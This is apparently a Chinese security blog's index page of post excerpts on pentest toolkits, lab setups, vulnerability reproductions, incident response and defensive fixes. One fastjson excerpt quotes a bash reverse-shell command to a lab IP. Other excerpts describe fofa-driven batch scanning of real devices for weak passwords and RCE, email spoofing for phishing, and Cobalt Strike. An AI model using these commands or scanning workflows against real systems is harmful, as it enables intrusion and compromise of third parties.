- 博客(143)
- 资源 (31)
- 收藏
- 关注
原创 DefectDojo漏洞管理平台一键傻瓜部署教程
但根据官方教程安装有各种各样的问题,要么是各种依赖报错,要么是镜像无法拉取,为了解决这个问题,我将安装包及所需依赖全部打包,编写一键安装教程,傻瓜式操作。可以看到集成了很多扫描器,AWVS、burp、sonarqube,无论是静态动态的代码审计,还是漏洞扫描,还是bug测试,应有尽有,强烈推荐。默认地址http://localhost:8080,默认账密:admin/Admin123..可集成各种开源安全工具,如nessu、awvs、nikto、nmap、dirsearch,所以强烈推荐。
2024-10-14 10:30:28 48
原创 win11渗透武器库,囊括所有渗透工具
开箱即用,最全的武器库,且都是2023年11月最新版,后续自己还可以再添加,下载地址:服务连接信息收集工具端口扫描代理抓包漏洞扫描指纹识别webshell目录探测密码破解漏洞查找渗透框架漏洞利用权限维持命令控制免杀远控提权辅助代理转发内网渗透系统组件。
2023-11-24 17:19:26 1220 2
原创 kali一键部署各种环境和渗透工具
5、配置6个国内apt源,阿里云、清华、浙大、中科大、重庆大学、东软大学,并更新安装列表。1、找一台纯净的kali系统,用root用户登录,将安装包下载,放到root目录下。21、安装webshell管理工具冰蝎4.0.2、蚁剑4.0.3、哥斯拉3.03。23、安装网站测试脚本7个,如检测网站证书、tls版本、标题状态码等。9、配置docker环境、安装docker-compose命令。18、安装各类jndi注入工具,ldap工具4个。13、部署CmsVulScan指纹识别工具、
2023-11-24 14:15:50 429
原创 CMS指纹识别方式
robots.txt文件我们写过爬虫的就知道,这个文件是告诉我们哪些目录是禁止爬取的。工具集合了多个 github 上的开源 cms 扫描工具的 payload 和匹配规则,使用md5、url、正则进行匹配识别。从robots.txt不能直接看出来是什么cms,我们就直接把他复制到百度去查询。Cms扫描器,用于识别网站使用的cms,后面有时间的话会加入poc模块。打开你要检测的网站,再点击此插件,就能看到相关信息。可以勾选允许再隐私窗口,也可以不选,点击好的。选择你对应的浏览器,这儿拿火狐举例子。
2023-11-24 13:38:15 440
原创 kali部署ARL灯塔资产系统及使用教程
资产分组功能用于整合资产范围内的域名资产到资产组中,用户也可以对资产组范围内的资产进行监 控,实时监控新增资产。新建资产组,可以通过批量导入的方式将资产范围内的域名资产添加到资产组中,一个资产组中可以 包含多个域名信息。添加监控任务 通过指定资产组,和添加监控任务操作,可以下发域名资产的监控任务到 ARL 中,后台将会根据运行间隔对监控任务内的资产进行扫描,用于发现监控新增的资产。通过创建不同的策略,可以对资产进行不同方案的扫描,可以针对不同类型的资产,根据资产的功能 创建指定的策略。
2023-11-24 11:29:14 886
原创 foxmail一键获取所有主流平台安全资讯、博客、公众号、威胁情报
很多安全岗位人员苦于没办法从众多主流安全平台获取最新安全资讯,或了解最新安全技术,现在有解决办法了,通过foxmail导入RSS阅读文件,此文件精心制作,包含所有主流安全资讯平台。点击左下角RSS阅读图标,在空白处右击,选择导入。导入成功,并且会自动推送最新安全资讯、技术贴等。打开foxmail,点击右上角——设置。选择插件——RSS阅读——启用——确定。全选所有来源,点导入。
2023-11-23 09:43:11 153
原创 最完整app、小程序、公众号抓包图文教程
WechatPlayer.exe,这包含了微信小程序、公众号、浏览器及播放器等,目标主机和端口选任意,动作选刚才建的代理服务器proxy https 10.105.23.68:8888,点击确定,在上一级窗口点击确定。选择将所有的证书都放在下列存储,点击浏览,选择收信人的根证书颁发机构,点击确定,在上一级窗口点击下一步。点击添加——输入物理机ip和端口(与burp设置一致),选择HTTPS,点确定,在上一级窗口也点确定。代理选择手动,主机名为物理机IP,端口和burp一致,点击保存。
2023-09-06 14:37:56 500
原创 给脚本设置license,设置有效期,绑定mac地址
我们看到新生成了tool.c tool.cpython-311-x86_64-linux-gnu.so文件和build目录,删除tool.c文件、setup.py和原本的tool.py,保留tool.cpython-311-x86_64-linux-gnu.so文件,把create_license.py文件移动到其他目录。2、新建一个新的main.py,然后将tool.py中要执行的函数移动到main.py中,相当于把tool.py核心功能通过import的方式引入 main.py。
2023-08-08 14:47:58 1073
原创 Huawei Auth-Http Server 1.0 passwd文件泄露漏洞
/Huawei-Auth-Http-Server1.0passwd文件泄露.bin -l 1.txt (将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。先用fofa脚本爬取所有碧海威相关资产(
2023-07-05 15:24:13 2792 3
原创 佑友防火墙默认口令及RCE漏洞
将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。python3 fofa-cwillchris.py -k title="佑友防火墙"./佑友防火墙弱口令及RCE.bin -l 1.txt (先用fofa脚本爬取所有碧海威相关资产(
2023-06-27 15:21:30 314
原创 360新天擎未授权访问数据库名及表名漏洞exp
python3 fofa-cwillchris.py -k title="360新天擎"将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。./360新天擎数据库及表未授权.bin -l 1.txt (先用fofa脚本爬取所有碧海威相关资产(
2023-06-26 17:09:39 705
原创 锐捷RG-UAC 账户硬编码漏洞
python3 fofa-cwillchris.py -k title="RG-UAC登录页面" && body="admin"将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。
2023-06-17 15:07:25 317
原创 蓝海卓越计费管理系统任意文件读取漏洞
将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。python3 fofa-cwillchris.py -k "蓝海卓越计费管理系统"./蓝海卓越计费管理系统.bin -l 1.txt (先用fofa脚本爬取所有碧海威相关资产(
2023-06-16 11:23:12 296
原创 碧海威L7默认弱口令检测脚本
将上面爬取到的文件(一般是final****.txt)移动到脚本目录下,保存为1.txt。python3 fofa-cwillchris.py -k "碧海威"./碧海L7.bin -l 1.txt (先用fofa脚本爬取所有碧海威相关资产(
2023-06-15 16:28:33 236
原创 中新金盾信息安全管理系统弱口令exp批量挖掘
python3 fofa-cwillchris.py -k title="中新金盾信息安全管理系统"将上面爬取到的文件(一般是final****.txt)移动到中金exp脚本目录下,保存为1.txt。
2023-06-14 10:38:36 242
原创 修复cors跨域资源共享漏洞
浏览器出于安全的考虑,使用 XMLHttpRequest对象发起 HTTP请求时必须遵守同源策略,否则就是跨域的HTTP请求,默认情况下是被禁止的,即JavaScript或Cookie只能访问同源(相同协议,相同域名,相同端口)下的内容。但由于跨域访问资源需要,出现了CORS机制,这种机制让web服务器能跨站访问控制,使跨站数据传输更安全。CORS需要阅览器和服务器同时支持,目前,主流的阅览器都支持cors。漏洞验证首先使用burpsuite抓包对http请求添加1。
2023-06-13 09:58:29 3055
原创 钓鱼邮件演练项目实战
它通常被用来伪造邮件,进行钓鱼、社工等操作,但是这种也是具有一定风险的,同时在这里提醒广大用户在收到邮件时,不要直接打开邮件,先看看邮件的域名以及头标题等信息是否正确,不然一个贸然的操作有时候将可能导致自己被钓鱼甚至攻击!--data ./Desktop/email.txt //将正常源邮件的内容保存成TXT文件,再作为正常邮件发送;--ehlo qq.com //伪造邮件ehlo头,即是发件人邮箱的域名。1、swaks --to test@qq.com //测试邮箱的连通性;
2023-05-10 10:53:31 1118 1
原创 kali php无法执行,直接下载或显示php文件内容
开启apache或nginx,访问php文件要么直接显示php文件内容,要么直接下载,这都是php文件无法解析的问题,需要nginx+php-fpm解决。Nginx 网站配置文件位置是 /etc/nginx/sites-available/default。Nginx 网站目录是 /var/www/html。浏览器访问,出现以下页面表示能正常解析php文件。重启nginx和php-fpm。查看是否安装,如下图则已安装。查看是否安装,如下图则已安装。未安装则执行安装nginx。
2023-05-09 18:53:50 1714
原创 windows安装sqli-labs靶场,两种方式
1、安装phpstudy官网打不开了,下载地址在这儿双击安装点自定义安装,选择安装目录,注意目录不要有空格和中文安装完成启动红框内的两个服务2、安装sqli靶场这个包支持php7,安装更简单打开phpstudy——网站——管理——打开根目录将sqli包解压到网站根目录,改名为sqli先查看一下数据库账号密码mysql配置文件在sqli-labs文件中sql-connections,打开db-creds.inc进行配置。
2023-04-21 11:19:30 686
原创 dirsearch 网站目录爆破工具
如:dirsearch -u www.baidu.com -e php -random-agents -r。-r 递归目录(跑出目录后,继续跑目录下面的目录)-random-agents 使用随机UA。
2023-04-12 10:59:51 358
原创 开源蜜罐hfish安装及使用教程
最后,根据被攻击的情况,又区分了云端 IP 画像和本地 IP 画像在云端画像中,可以通过他的攻击行为判定他的威胁程度。会展示数据库内所有数据,呈现直观展示。HFish 的蜜饵在牵引攻击者的功能上增加了精确定位失陷能力,即每个蜜饵都是唯一的,攻击者入侵用户主机后,如果盗取蜜饵文件中的数据并从任意主机发起攻击,防守者仍能知道失陷源头在哪里。通过增加威胁检测引擎,支持规则检测,且支持上传自定义 yara 规则,系统自动化分析数据,判定攻击行为,丰富 IP 威胁判定,更清晰的感受攻击态势和攻击情况。
2023-04-10 15:46:58 1604
原创 shell脚本打印时间命令
+%Y%m%d 为指定显示格式。#本月第一天 20230401。#今日日期 20230406。#本月 202304。
2023-04-06 14:36:32 2274
原创 修复Diffie-Hellman Key Agreement Protocol 资源管理错误漏洞(CVE-2002-20001)
通过修改sshd_config配置文件,屏蔽掉不安全的KexAlgorithjms,其中具体的sshd_config配置参数可以从man文档中查看。再次使用禁用了diffie-hellman算法之后,带上被禁用的密钥算法登录,显示不能正常使用ssh登录。查看Kexalgorithms-此举操作是确认客户端支持的kexalgorithms。未禁用diffie-hellman算法之前,可用正常使用ssh连接登录。不加任何加密算法,正常使用ssh也可以登录。使用奇安信漏扫,已无法扫出,漏洞修复。
2023-03-24 10:23:09 11534 4
原创 fastjson1.2.24 反序列化漏洞原理、环境搭建、利用图
6、目标机获取HackerFile文件内容并执行,HackerFile文件包含反弹shenll命令(/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.3/5555 0>&1)1、kali(192.168.1.3)作为用户,访问目标机192.168.1.10:8090,并提交恶意数据rmi://192.168.1.3:6666。抓包修改请求方法为POST,最下面空一行添加{"name":"Cwillchris", "age":20},即可更新服务端的信息。
2023-03-17 11:06:50 680
原创 thinkphp5.0.23rce复现
其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。从图中可以看出,docker0网卡发生了错误,并且没有常见的IPV4,这里基本可以确定是docker的网络出现了问题 , 可以通过重置docker网络解决。可以发现docker的网卡正常了,并且通过物理机访问docker容器中的应用也已经正常。这样就掌握了漏洞利用的完整过程。启动环境,启动环境会先拉取镜像,网络不好可能会拉取不下来的。
2023-03-13 17:56:42 668
原创 log4j2漏洞原理详解、漏洞复现及漏洞利用
虽然/dev/tcp/${HOST}/${PORT}这个字符虽然看起来像一个文件系统中的文件,并且位于/dev这个设备文件夹下,但是这个文件并不存在,并且不是一个设备文件。这只是 bash 实现的用来实现网络请求的一个接口,其实就像我们自己编写的一个命令行程序,按照指定的格式输入 host port 参数,就能发起一个 socket 连接。这两组重定向,将输入,输出,报错信息都输入到/dev/tcp/192.168.1.3/6666 这里了,就相当于把整个 shell 会话,都重定向到 tcp 连接中了。
2023-03-13 00:23:27 1430
原创 kali配置不同版本java并随时切换
2、建立目录,将下载的jdk的安装包复制过去并进行解压。3、配置环境变量(注意下面的版本号要与自己下载的相同)打开文件/etc/profile。4、通知系统Java的位置。5、重新载入profile。1、安装JDK1.8。添加下列代码到文件中。
2023-03-13 00:22:41 2579 2
原创 centos安装docker,docker-cpmpose教程及疑难解决
输入systemctl status docker.service,发现 docker不支持图像内核驱动:SELinux不支持这个内核上的OrthALA2图形驱动程序。报错如下,让通过 systemctl status docker.service 和 journalctl -xe 命令查看详情。3、下载安装docker-compose到/usr/local/bin下面,被拒绝连接就多试几次。创建链接,这样才能直接使用docker-compose命令。查看是否安装成功 git --version。
2023-03-09 13:32:11 534 2
原创 开源免费堡垒机Teleport堡垒机的安装
使用管理员账号登陆后,选择【审计】-->【会话审计】进入会话列表就可以自由查看对应用户对指定服务器资产的详细操作记录了。点击添加账号,把要保护的服务器(192.168.1.10)的用户名和密码输入,点测试连接。/etc/init.d/teleport status 查看Teloport的运行状态。/etc/init.d/teleport restart 重启Teleport。/etc/init.d/teleport stop 停止Teleport。《1》添加需要管理的服务器资产,即需要堡垒机保护的服务器。
2023-03-08 15:37:22 1092
原创 kali安装cobaltstrike详细教程
启动cs的服务端./teamserver 你的ip 密码(密码随便设置一个,待会用于客户端连接)下载cobaltstrike-linux版本,此下载链接提供4.3,4.4,4.5三个版本。给cs的服务端teamserver和客户端start.sh执行权限。进入cobaltstrike目录,ls查看如下。如果出现以下报错,说明jdk有问题。让你校验密码哈希值是否一直,点击是。xshell上传至kali,解压。输入以下内容,点击connect。重新安装jdk解决以上问题。
2022-12-30 14:50:02 4840
原创 kali安装ShuiZe自动化信息收集工具
python3 ShuiZe.py -d domain.com --ksubdomain 0 不调用ksubdomain爆破子域名。python3 ShuiZe.py --fofaTitle XXX大学 从fofa里收集标题为XXX大学的资产,然后漏洞检测。python3 ShuiZe.py -d domain.com --justInfoGather 1 仅信息收集,不检测漏洞。python3 ShuiZe.py -d domain.com 收集单一的根域名资产。执行以下命令,出现如下图,说明安装成功。
2022-10-26 16:47:02 1632 2
原创 Kunyu安装使用教程(linux)
Kunyu(坤舆),是一款基于 ZoomEye API 开发的信息收集工具,旨在让企业资产收集更高效,EncodeHash #搜索加密方法的接口。SearchDomain #基于域名搜索子域名。SearchIcon / #图标图片搜索。Seebug #搜索Seebug漏洞信息。SearchHost #查询主机信息。SearchWeb #查询web信息。
2022-10-26 14:52:51 1045
原创 windows系统应急响应
2、推荐工具:Window 下,推荐用 EmEditor 进行日志分析,支持大文本,搜索效率还不错。运行 Win+R,输入lusrmgr.msc 回车,通过本地用户和组的管理页面(或者“计算机管理”)的可以查看到隐藏账户。最后应急处置,当然是杀死进程并删除后门文件,执行命令taskkill /F /pid 1472。删除可疑用户,可以直接删除或用cmd命令net user hacker$ /del 删除。安装好LogParser后,cmd切换到LogParser安装目录,执行以下命令。
2022-09-29 17:43:38 2836
原创 相对路径覆盖漏洞攻击RPO详解
此攻击方法依赖于浏览器和服务器的反应,基于服务器的Web缓存技术和配置差异,以及服务器和客户端浏览器的解析差异,利用前端代码中加载的css/js的相对路径来加载其他文件,最终浏览器将服务器返回的不是css/js的文件当做css/js来解析,从而导致XSS,信息泄露等漏洞产生。这就是相对路径覆盖攻击, 我们成功用/aaa目录下的b.js覆盖掉了a.html中静态资源b.js的路径.如果我们控制网站根目录下的aaa的目录下面的b.js的内容,写入/aaa/b.js内容如下。输入如下代码,保存退出。
2022-09-26 14:42:25 4251
原创 kali自带——dirb网站目录爆破枚举
默认情况下,dirb 扫描以递归方式扫描目录。这意味着它扫描目录,然后遍历该目录以扫描更多子目录。但在某些情况下,如果时间不够,我们会将 dirb 设置为不递归扫描。这可以使用-r 参数来实现。基于字典的 Web 目录扫描工具 DIRB。作用,专门扫描/猜测 Web 站点下有哪些目录,发现潜在的渗透目标。-r Don't Search Recursively. 不要递归搜索;common.txt 被设置为目录遍历的默认单词列表。-o 将输出保存到磁盘。...
2022-08-18 14:49:17 6602
原创 xsrc腾讯应急响应中心部署全网最详细教程
MariaDB [(none)]> ALTER USER 'root'@'localhost' IDENTIFIED VIA mysql_native_password USING PASSWORD("新密码");访问管理端:http://ip/admin.php, 输入邮箱密码登录(注意输入邮箱而不是刚才的用户名,否则会报程序错误)查看本机ip,然后访问 http://ip/install.php。设置账户名(昵称),邮箱(登录账号),密码(登录密码)访问用户端: http://ip/user.php。.
2022-08-16 13:39:21 1569
原创 最全Linux 应急响应-溯源-系统日志排查
黑客入侵系统后一般会将系统日志清空,以达到清理痕迹的作用,如果日志被黑客清空我们就无法通过日志来分析黑客入侵系统后都做了哪些事情,在很多情况下黑客在清理日志的时候都会忽略内存中的日志。将本次登录的命令写入命令历史文件中,命令不是使用了就立即写入到文件中的,会现在缓存中,用户退出登录时会自动写入文件,-w 命令可以立即写入,-c 命令可以清除当前缓存中的命令。创建),但若失败(例如在系统启动早期"/var"尚未挂载),则转而保存在 /run/log/journal 目录中(将会被自动按需创建)。...
2022-08-04 14:19:24 1100
原创 暴力破解-破解 Apache BASIC 认证
可以看到 DVWA 的登录页面是存在 user_token 的,如果每次提交新密码时都使用同一个 token,服务器通常来说是不处理我们的请求的。把刚获取到的最新的有效 token 复制到递归搜索中,因为原数据包中的 token 在我们提取 token 的时候被使用了,所以这里需要设置一个有效的 token。添加关键词匹配admin,如果服务器返回的应答包中存在对应的关键词,则对该请求进行标记,用于验证是否成功,一般暴力破解选择的关键词:用户名、登录提示、页面特征。...
2022-08-03 09:38:27 429
原创 暴力破解ssh/rdp/mysql/smb服务
原因是echo会生成一个换行符,如果不需要换行符则需要使用-n参数,但是我们的字典文件中的密码是一行一行的也存在换行符,所以我们原始数据和结果都是添加了换行符的,但是最终的结果都会是正确的。注如果你登录win7中的用户名不是administrator,而是自己安装系统的时候创建的用户名,那就使用自己的帐号。Hydra对应的中文意思是九头蛇,它是一款爆破神器,可以对多种服务的账号和密码进行爆破,包。暴力破解软件的要素IP,用户名,端口号,字典,调一下暴力破解的进程数加快速度。...
2022-08-02 15:28:47 867
vulhub靶场搭建安装包,包含docker-compose安装包
2023-02-01
Burpsuite-kali稳定版
2022-12-30
cobaltstrike多个版本
2022-12-30
Burp2022年最新版 Linux版
2022-12-30
burpsuite2022年最新版-Windows版
2022-12-30
BurpSuite2022年-MAC版
2022-12-30
ShuiZe自动化信息收集、漏洞监测安装包
2022-10-26
host碰撞工具,包含python和go两种碰撞工具
2022-05-16
django-DefectDojo.DefectDojo傻瓜版一键安装包加脚本
2024-10-14
应急响应-自动化Windows和Linux系统证据链收集工具
2023-12-01
window11武器库
2023-11-24
安全咨询、博客、公众号集成
2023-11-23
Huawei Auth-Http Server 1.0 passwd文件泄露漏洞POC
2023-07-05
护网全套教学pdf资料和工具包
2023-06-29
佑友防火墙弱口令及RCE 检测脚本
2023-06-27
360新天擎数据库及表未授权访问漏洞exp
2023-06-26
锐捷RG-UAC 账户硬编码漏洞批量检测exp
2023-06-17
fofa爬虫(无需会员,无需cookie或登录)
2023-05-17
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人